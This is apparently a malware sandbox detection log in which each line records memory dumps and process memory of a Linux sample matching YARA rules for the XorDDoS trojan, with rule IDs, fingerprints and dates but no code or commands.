Source: 9994.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10302.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10302.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10302.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9673.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9673.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9673.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10236.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10236.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10236.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10170.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10170.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10170.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9717.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9717.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9717.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9618.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9618.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9618.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9805.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9805.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9805.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9574.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9574.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9574.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9451.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9451.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9451.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9981.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9981.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9981.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9860.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9860.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9860.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10434.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10434.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10434.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10368.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10368.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10368.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10401.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10401.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10401.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10027.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10027.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10027.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10225.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10225.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10225.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9451, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9454, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9457, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9462, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9552, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9563, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9574, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9585, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9596, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9607, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9618, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9629, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9640, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9651, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9662, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9673, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9684, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9695, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9706, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9717, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9728, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9739, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9750, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9761, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9772, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9783, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: iJl2Sb6qRa PID: 9794, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
